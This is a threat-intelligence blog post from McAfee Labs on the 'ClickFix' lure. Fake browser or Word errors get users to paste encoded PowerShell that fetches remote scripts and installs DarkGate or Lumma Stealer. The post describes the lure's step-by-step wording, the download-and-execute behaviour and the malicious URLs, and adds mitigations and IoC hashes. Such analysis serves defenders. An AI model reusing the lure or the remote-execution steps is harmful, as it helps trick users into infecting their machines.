Yashvi Shah and Vignesh Dhatchanamoorthy

McAfee Labs has discovered a highly unusual method of malware delivery, referred to by researchers as the “Clickfix” infection chain. The attack chain begins with users being lured to visit seemingly legitimate but compromised websites. Upon visiting, victims are redirected to domains hosting fake popup windows that instruct them to paste a script into a PowerShell terminal.

The “ClickFix” infection chain represents a sophisticated form of social engineering, leveraging the appearance of authenticity to manipulate users into executing malicious scripts. These compromised websites are often carefully crafted to look genuine, increasing the likelihood of user compliance. Once the script is pasted and executed in the PowerShell terminal, it allows the malware to infiltrate the victim’s system, potentially leading to data theft, system compromise, or further propagation of the malware.

We have observed malware families such as Lumma Stealer and DarkGate leveraging this technique. Here is the heatmap showing the distribution of users affected by the “Clickfix” technique:

Figure 1:Prevalence for the last three months

Darkgate ingesting via “ClickFix”

DarkGate is a sophisticated malware known for its ability to steal sensitive information, provide remote access, and establish persistent backdoors in compromised systems. It employs advanced evasion tactics and can spread within networks, making it a significant cybersecurity threat.
McAfee Labs obtained a phishing email from the spamtrap, having an HTML attachment.

Figure 2: Email with Attachment

The HTML file masquerades as a Word document, displaying an error prompt to deceive users. This tactic is used to trick users into taking actions that could lead to the download and execution of malicious software.

Figure 3: Displays extension problem issue

As shown, the sample displays a message stating, “The ‘Word Online’ extension is NOT installed in your browser. To view the document offline, click the ‘How to fix’ button.”

Before clicking on this button, let’s examine the underlying code. Upon examining the code, it was discovered that there were several base64-encoded content blocks present. Of particular significance was one found within the <Title> tag, which played a crucial role in this scenario.

Figure 4: HTML contains Base64-encoded content in the title tag

Decoding this we get,

Figure 5: After decoding the code

The decoded command demands PowerShell to carry out malicious activities on a system. It starts by downloading an HTA (HTML Application) file from the URL https://www.rockcreekdds.com/wp-content/1[.]hta and saves it locally as C:userspublicIx.hta.

The script then executes this HTA file using the start-process command, which initiates harmful actions on the system. Additionally, the script includes a command (Set-Clipboard -Value ‘ ‘) to clear the contents of the clipboard. After completing its tasks, the script terminates the PowerShell session with exit.

Upon further inspection of the HTML page, we found a javascript at the end of the code.

Figure 6: Decoding function snippet

This JavaScript snippet decodes and displays a payload, manages modal interactions for user feedback, and provides functionality for copying content to the clipboard upon user action.

In a nutshell, clicking on the “How to fix” button triggers the execution of JavaScript code that copies the PowerShell script directly onto the clipboard. This script, as previously discussed, includes commands to download and execute an HTA file from a remote server.

Let’s delve into it practically:

Figure 7: Clipboard contains malicious command

The attackers’ additional instruction to press Windows+R (which opens the Run dialog) and then press CTRL+V (which pastes the contents from the clipboard) suggests a social engineering tactic to further convince the user to execute the PowerShell script. This sequence of actions is intended to initiate the downloaded script (likely stored in the clipboard) without the user fully understanding its potentially malicious nature.

Once the user does this, the HTA file gets downloaded.

Figure 8: HTA code snippet

The above file attempts to connect to the marked domain and execute a PowerShell file from this malicious source. Given below is the malicious script that is stored remotely and executed.

Figure 9: Powershell code snippet

As this PowerShell script is executed implicitly without any user interaction, a folder is created in the C drive where an AutoIt executable and script are dropped and executed automatically.

Figure 10: Downloaded zip contains AutoIT script

Following this, DarkGate begins its malicious activity and starts communicating with its command and control (C2) server.

A similar Clickfix social engineering technique was found to be dropping Lumma Stealer.

Lumma Stealer ingesting via “ClickFix”

McAfee Labs discovered a website displaying an error message indicating that the browser is encountering issues displaying the webpage. The site provides steps to fix the problem, which are designed to deceive users into executing malicious actions.

Figure 11: Showing error on accessing the webpage

It directs the target user to perform the following steps:

Click on the “Copy Fix” button.
Right-click on the Windows icon.
Open Windows PowerShell (Admin).
Right-click within the open terminal window.
Wait for the update to complete.

Let’s analyze the code that gets copied when clicking the “Copy Fix” button.

Figure 12: Base64-encoded content

As we can see, the code includes base64-encoded content. Decoding this content, we get the following script:

Figure 13: After decoding the Base64 content

This PowerShell script flushes the DNS cache and then decodes a base64-encoded command to fetch and execute a script from a remote URL https://weoleycastletaxis.co.uk/chao/baby/cow[.]html, masquerading the request with a specific User-Agent header. The fetched script is then executed, and the screen is cleared to hide the actions. Subsequently, it decodes another base64 string to execute a command that sets the clipboard content to a space character. The script is likely designed for malicious purposes, such as downloading and executing remote code covertly while attempting to hide its activity from the user.

Upon execution, the following process tree flashes:

Figure 14: Process Tree

As we know it is downloading the malware from the given URL, a new folder is created in a Temp folder and a zip is downloaded:

Figure 15: Network activity

The malware is unzipped and dropped in the same folder:

Figure 16: Dropped files

The malware starts communicating with its C2 server as soon as it gets dropped in the targeted system.

Conclusion:

In conclusion, the Clickfix social engineering technique showcases a highly effective and technical method for malware deployment. By embedding base64-encoded scripts within seemingly legitimate error prompts, attackers deceive users into performing a series of actions that result in the execution of malicious PowerShell commands. These commands typically download and execute payloads, such as HTA files, from remote servers, subsequently deploying malware like DarkGate and Lumma Stealer.

Once the malware is active on the system, it begins its malicious activities, including stealing users’ personal data and sending it to its command and control (C2) server. The script execution often includes steps to evade detection and maintain persistence, such as clearing clipboard contents and running processes in minimized windows. By disguising error messages and providing seemingly helpful instructions, attackers manipulate users into unknowingly executing harmful scripts that download and run various kinds of malware.

Mitigations:

At McAfee Labs, we are committed to helping organizations protect themselves against sophisticated cyber threats, such as the Clickfix social engineering technique. Here are our recommended mitigations and remediations:

Conduct regular training sessions to educate users about social engineering tactics and phishing schemes.
Install and maintain updated antivirus and anti-malware software on all endpoints.
Implement robust email filtering to block phishing emails and malicious attachments.
Use web filtering solutions to prevent access to known malicious websites.
Deploy firewalls and intrusion detection/prevention systems (IDS/IPS) to monitor and block malicious network traffic.
Use network segmentation to limit the spread of malware within the organization.
Enforce the principle of least privilege (PoLP) to minimize user access to only necessary resources.
Implement security policies to monitor and restrict clipboard usage, especially in sensitive environments.
Implement multi-factor authentication (MFA) for accessing sensitive systems and data.
Ensure all operating systems, software, and applications are kept up to date with the latest security patches.
Continuously monitor and analyze system and network logs for signs of compromise.
Encrypt sensitive data both in transit and at rest to protect it from unauthorized access.
Regularly back up important data and store backups securely to ensure data recovery in case of a ransomware attack or data breach.

Indicators of Compromise (IoCs)

File
SHA256

DarkGate

Email
c5545d28faee14ed94d650bda28124743e2d7dacdefc8bf4ec5fc76f61756df3

Html
0db16db812cb9a43d5946911501ee8c0f1e3249fb6a5e45ae11cef0dddbe4889

HTA
5c204217d48f2565990dfdf2269c26113bd14c204484d8f466fb873312da80cf

PS
e9ad648589aa3e15ce61c6a3be4fc98429581be738792ed17a713b4980c9a4a2

ZIP
8c382d51459b91b7f74b23fbad7dd2e8c818961561603c8f6614edc9bb1637d1

AutoIT script
7d8a4aa184eb350f4be8706afb0d7527fca40c4667ab0491217b9e1e9d0f9c81

Lumma Stealer

URL
tuchinehd[.]com

PS
07594ba29d456e140a171cba12d8d9a2db8405755b81da063a425b1a8b50d073

ZIP
6608aeae3695b739311a47c63358d0f9dbe5710bd0073042629f8d9c1df905a8

EXE
e60d911f2ef120ed782449f1136c23ddf0c1c81f7479c5ce31ed6dcea6f6adf9

 

The post ClickFix Deception: A Social Engineering Tactic to Deploy Malware appeared first on McAfee Blog.

Read More